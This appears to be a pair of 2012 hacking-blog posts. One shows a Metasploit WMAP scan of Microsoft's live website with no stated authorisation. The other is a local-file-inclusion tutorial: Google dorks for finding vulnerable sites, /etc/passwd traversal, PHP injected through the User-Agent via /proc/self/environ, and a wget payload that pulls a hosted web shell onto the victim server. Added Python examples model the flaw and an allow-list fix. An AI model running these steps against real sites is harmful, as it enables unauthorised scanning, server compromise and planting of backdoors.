Saturday, December 15, 2012

WMAP WEB SCANNER METASPLOIT

ur0b0r0x@consolex_ /opt/metasploit-4.4.0/msf3 $ msfconsole

     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 951 exploits - 506 auxiliary - 152 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops

msf > db_connect -y /opt/metasploit-4.4.0/config/database.yml
msf > load wmap

.-.-.-..-.-.-..---..---.
| | | || | | || | || |-'
`-----'`-'-'-'`-^-'`-'
[WMAP 1.5.1] ===  et [  ] metasploit.com 2012
[*] Successfully loaded plugin: wmap

msf > wmap_sites -a www.microsoft.com,http://65.55.58.201/
[*] Site created.
msf > wmap_sites -l
[*] Available sites
===============

 Id  Host             Vhost                Port  Proto  # Pages  # Forms
 --  ----             -----                ----  -----  -------  -------
 0   65.55.58.201     www.microsoft.com    80    http   0        0


msf > wmap_sites -s 0 1
    [www.microsoft.com] (65.55.58.201)
msf > wmap_targets -t microsoft.com,http://65.55.58.201/
msf > set DOMAIN www.microsoft.com
DOMAIN => www.microsoft.com
msf > wmap_targets  -d 0
[*] Loading www.microsoft.com,http://65.55.58.201:80/.
msf > wmap_targets  -l
[*] Defined targets
===============

     Id  Vhost              Host          Port  SSL    Path
     --  -----              ----          ----  ---    ----
     0   www.microsoft.com  65.55.58.201  80    false    /


msf > wmap_run -t
[*] Testing target:
[*]     Site: www.microsoft.com (65.55.58.201)
[*]     Port: 80 SSL: false
============================================================
[*] Testing started. 2012-09-17 17:48:50 -0500
[*] Loading wmap modules...

[*] 38 wmap enabled modules loaded.
[*]
=[ SSL testing ]=
============================================================
[*] Target is not SSL. SSL modules disabled.
[*]
=[ Web Server testing ]=
============================================================
[*] Module auxiliary/scanner/http/http_version
[*] Module auxiliary/scanner/http/open_proxy
=[ File/Dir testing ]=
============================================================
[*] Module auxiliary/scanner/http/backup_file
[*] Module auxiliary/scanner/http/brute_dirs
[*] ETC ETC ETC ETC ETC.....
=[ Unique Query testing ]=
============================================================
[*] Module auxiliary/scanner/http/blind_sql_query
[*] Module auxiliary/scanner/http/error_sql_injection
[*] ETC ETC ETC ETC ETC.....

 
msf > wmap_run -e
[*] Using ALL wmap enabled modules.
[*] Testing target:
[*]     Site: www.microsoft.com (65.55.58.201)
[*]     Port: 80 SSL: false
============================================================
[*] Testing started. 2012-09-17 18:03:07 -0500
[*]
=[ SSL testing ]=
============================================================
[*] Target is not SSL. SSL modules disabled.
[*]
=[ Web Server testing ]=
============================================================
[*] Module auxiliary/scanner/http/http_version

[*] 65.55.58.201:80 Microsoft-IIS/7.5 ( Powered by ASP.NET, 301-http://www.microsoft.com )
[*] ETC ETC ETC......

msf > hosts -c address,svcs,vulns

Hosts
=====
address        svcs  vulns
-------        ----  -----
65.55.58.201    1     1
msf > vulns
[*] Time: 2012-09-17 18:05:49 UTC Vuln: host=65.55.58.201 port=80 proto=tcp name=auxiliary/scanner/http/options refs=CVE-2005-3398,CVE-2005-3498,OSVDB-877,BID-11604,BID-9506,BID-9561
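The one finding wmap recorded comes from auxiliary/scanner/http/options, which sends an OPTIONS request and looks at the methods the server advertises in its Allow header; the references attached to it (CVE-2005-3398, OSVDB-877 and the BIDs) are the HTTP TRACE / cross-site tracing advisories. The Python below is an added example, not Metasploit's module code: it parses a vulns line of the form shown above into fields, re-implements the Allow-header check offline on a constructed response, and includes a live variant for a host you are authorised to test. RISKY_METHODS and SAMPLE_RESPONSE are the editor's assumptions, not Metasploit's data.

```python
"""Re-check of the finding wmap recorded above (added example, not Metasploit code).

auxiliary/scanner/http/options sends an OPTIONS request and records the methods
the server advertises in its Allow header.  parse_vuln_line() turns a `vulns`
line of the form shown above into fields; parse_allow() / risky_methods() do the
method check offline on a constructed response; check_host() is the live
variant (network access required).  RISKY_METHODS and SAMPLE_RESPONSE are the
editor's assumptions, not Metasploit's data.
"""
import http.client
import re
from typing import Dict, List, Optional

# Methods worth flagging on a production web server (editor's list).
RISKY_METHODS: Dict[str, str] = {
    "TRACE": "cross-site tracing (XST); what the CVE-2005-3398 / OSVDB-877 refs describe",
    "TRACK": "Microsoft synonym for TRACE",
    "PUT": "may allow uploading files to the document root",
    "DELETE": "may allow deleting resources",
    "CONNECT": "may allow proxying through the server",
}

VULN_RE = re.compile(r"Vuln:\s+(?P<fields>.+)$")


def parse_vuln_line(line: str) -> Optional[Dict[str, object]]:
    """Parse '[*] Time: ... Vuln: host=... port=... name=... refs=a,b' into a dict."""
    m = VULN_RE.search(line)
    if not m:
        return None
    fields: Dict[str, object] = {}
    for token in m.group("fields").split():
        key, sep, value = token.partition("=")
        if sep:
            fields[key] = value
    refs = fields.get("refs", "")
    fields["refs"] = [r for r in str(refs).split(",") if r]
    return fields


def parse_allow(raw_response: bytes) -> List[str]:
    """Methods listed in the Allow header of a raw HTTP response (empty if none)."""
    head = raw_response.split(b"\r\n\r\n", 1)[0]
    for line in head.split(b"\r\n")[1:]:          # skip the status line
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"allow":
            return [m.strip().upper() for m in value.decode("latin-1").split(",") if m.strip()]
    return []


def risky_methods(methods: List[str]) -> Dict[str, str]:
    """Subset of `methods` that appears in RISKY_METHODS, with the reason."""
    return {m: RISKY_METHODS[m] for m in methods if m in RISKY_METHODS}


def check_host(host: str, port: int = 80, path: str = "/", timeout: float = 5.0) -> Dict[str, str]:
    """Live check: send OPTIONS to host:port and return the risky methods it advertises."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("OPTIONS", path, headers={"Host": host})
        allow = conn.getresponse().getheader("Allow") or ""
    finally:
        conn.close()
    return risky_methods([m.strip().upper() for m in allow.split(",") if m.strip()])


# Constructed sample response (not a capture from the host in the log above).
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Microsoft-IIS/7.5\r\n"
    b"Allow: OPTIONS, TRACE, GET, HEAD, POST\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)

# The vulns line from the session above, reused as parser input.
SAMPLE_VULN_LINE = (
    "[*] Time: 2012-09-17 18:05:49 UTC Vuln: host=65.55.58.201 port=80 proto=tcp "
    "name=auxiliary/scanner/http/options refs=CVE-2005-3398,CVE-2005-3498,OSVDB-877,"
    "BID-11604,BID-9506,BID-9561"
)

if __name__ == "__main__":
    v = parse_vuln_line(SAMPLE_VULN_LINE)
    print(v["name"], v["refs"])
    allowed = parse_allow(SAMPLE_RESPONSE)
    print("allowed:", allowed)
    for method, why in risky_methods(allowed).items():
        print(f"[!] {method}: {why}")
```

Run it as-is to see the offline check; call check_host("host.example", 80) only against a target you are allowed to scan. A server that answers OPTIONS with TRACE in Allow has not been exploited yet, which is also true of the wmap finding above: it is a configuration weakness to report, not a shell.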

Tuesday, December 11, 2012

Local File Inclusion Vulnerability Demonstration - Web Hacking

Local file inclusion is a very popular web application attack. It was very common a few years back, and these days you will rarely find a website vulnerable to it; however, a single such vulnerability is still enough to get a website fully compromised.

Here are some of the common parameters (Google dorks) used to find pages that may be vulnerable to local or remote file inclusion attacks:

index.php?index2=
index.php?homepage=
index.php?page=
 
Requirements:

1) A Vulnerable Website
2) Remote shell ( http://www.sh3ll.org/egy.txt )
3) User-Agent switcher ( https://addons.mozilla.org/en-US/firefox...-switcher/ )
4) Mozilla Firefox

The first thing a hacker will do while looking for an LFI vulnerability is try to include the /etc/passwd file, typically by passing a traversal path such as ../../../etc/passwd in the vulnerable parameter. If the file's contents show up in the page, a local file inclusion vulnerability is present. The image below explains the whole story: "root" is the username, followed by "x", which stands in for the password field. The "x" means the password hash is shadowed, i.e. stored in /etc/shadow, a file that is only readable with root privileges.



Next the hacker will check for /proc/self/environ, so change the included path to /proc/self/environ. This file holds the environment of the process that serves the request, as NUL-separated KEY=VALUE pairs. It should look something like the image below if it is accessible; not every server exposes it, since the web server process may be blocked from reading it (open_basedir, for example) and it only carries the request headers in setups where PHP is run per request with the CGI environment.


Once the local file inclusion vulnerability has been identified, the hacker will try to turn it into remote code execution and from there gain further access. This is done by uploading a PHP backdoor. The trick is that the request headers, including the User-Agent, are part of the environment shown by /proc/self/environ, so whatever PHP code is placed in the User-Agent is included and executed along with the file. A commonly used tool for setting the header is the User Agent Switcher add-on linked above.


The hacker adds a new User-Agent in the add-on and sets its value to the following:

<?php phpinfo();?>

Select it in Tools > Default User Agent > PHP Info (or whatever you named the User-Agent).



After refreshing the page, the phpinfo() output appears in place of the environment. He then searches for the keyword "disable_functions" (Ctrl+F):

disable_functions | no value | no value


An empty disable_functions value means that exec() and the other command-execution functions are available to the injected code, so the website is vulnerable to remote code execution and a PHP backdoor can be planted. Having confirmed this, he changes the User-Agent to the following payload and reloads the page:


<?php exec('wget http://www.sh3ll.org/egy.txt -O shell.php'); ?>

The command makes the web server itself download the backdoor, which is hosted as a plain .txt file so that it is served as source instead of being executed on the hosting site, and save it as shell.php in the server's working directory. (The original post used the short open tag "<?", which only works when short_open_tag is enabled; "<?php" works everywhere.) The shell is now on the server, and opening shell.php in the browser brings up the backdoor's own web interface.
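The whole chain (path traversal to /etc/passwd, then /proc/self/environ with PHP smuggled in through the User-Agent) is easiest to reason about with a small model of the vulnerable handler next to its fix. The Python below is an added example written for this page, not the page's own code or any project's: FAKE_FS, fake_environ() and the include behaviour are constructed stand-ins for PHP's include($_GET['page']), nothing is executed, and include_page_hardened() shows the allow-list fix that closes both the traversal and the /proc trick.

```python
"""Model of the LFI chain from the tutorial above, next to a hardened handler.

Added example written for this page, not the page's own code.  FAKE_FS, the
request fields and the include behaviour are constructed stand-ins for a PHP
include($_GET['page']) handler; no real server or PHP is involved and nothing
is executed, the injected PHP is only shown to land in the included stream.
"""
import posixpath
import re
from typing import Optional

PAGES_DIR = "/var/www/pages/"

# Constructed fake filesystem (not a capture from any real host).
FAKE_FS = {
    "/var/www/pages/home.php": "<h1>Welcome</h1>",
    "/var/www/pages/about.php": "<h1>About</h1>",
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n"
                   "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n",
}


def fake_environ(user_agent: str) -> str:
    """What /proc/self/environ of a PHP process run as CGI can contain: the
    process environment as NUL-separated KEY=VALUE pairs, request headers
    included.  Constructed, but HTTP_USER_AGENT is why the tutorial's trick works."""
    pairs = ["PATH=/usr/local/bin:/usr/bin",
             "DOCUMENT_ROOT=/var/www",
             f"HTTP_USER_AGENT={user_agent}"]
    return "\x00".join(pairs) + "\x00"


def read_path(path: str, user_agent: str) -> Optional[str]:
    if path == "/proc/self/environ":
        return fake_environ(user_agent)
    return FAKE_FS.get(path)


def include_page_vulnerable(page: str, user_agent: str) -> Optional[str]:
    """Models  include($_GET['page']);  the parameter is used as a path, so
    '../' walks out of PAGES_DIR and an absolute path is taken as-is."""
    path = page if page.startswith("/") else posixpath.normpath(PAGES_DIR + page)
    return read_path(path, user_agent)


ALLOWED_PAGES = {"home": "home.php", "about": "about.php"}


def include_page_hardened(page: str, user_agent: str) -> Optional[str]:
    """Allow-list fix: the parameter selects a key, never a path."""
    filename = ALLOWED_PAGES.get(page)
    if filename is None:
        return None            # a real handler would send 404 here
    return read_path(PAGES_DIR + filename, user_agent)


PASSWD_LINE = re.compile(r"^root:x?:0:0:", re.M)
PHP_TAG = re.compile(r"<\?php.*?\?>", re.S)


def confirms_lfi(body: Optional[str]) -> bool:
    """Step 1 of the tutorial: the root line of /etc/passwd shows up in the response."""
    return bool(body) and PASSWD_LINE.search(body) is not None


def reflected_php(body: Optional[str]) -> Optional[str]:
    """Steps 2-3: attacker-controlled PHP source is present in the included stream,
    which is the point at which a real PHP include would execute it."""
    if not body:
        return None
    m = PHP_TAG.search(body)
    return m.group(0) if m else None


if __name__ == "__main__":
    ua = "<?php phpinfo();?>"
    print(confirms_lfi(include_page_vulnerable("../../../etc/passwd", ua)))
    print(reflected_php(include_page_vulnerable("/proc/self/environ", ua)))
    print(include_page_hardened("../../../etc/passwd", ua))
    print(include_page_hardened("home", ua))
```

The hardened version does not try to sanitise the path (stripping "../" or ".." is the classic wrong fix, since sequences like "....//" survive a single pass); it never builds a path from user input at all. Disabling allow_url_include and setting open_basedir are worthwhile defence in depth, but only the allow-list removes the bug.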

Feel free to ask about any issue.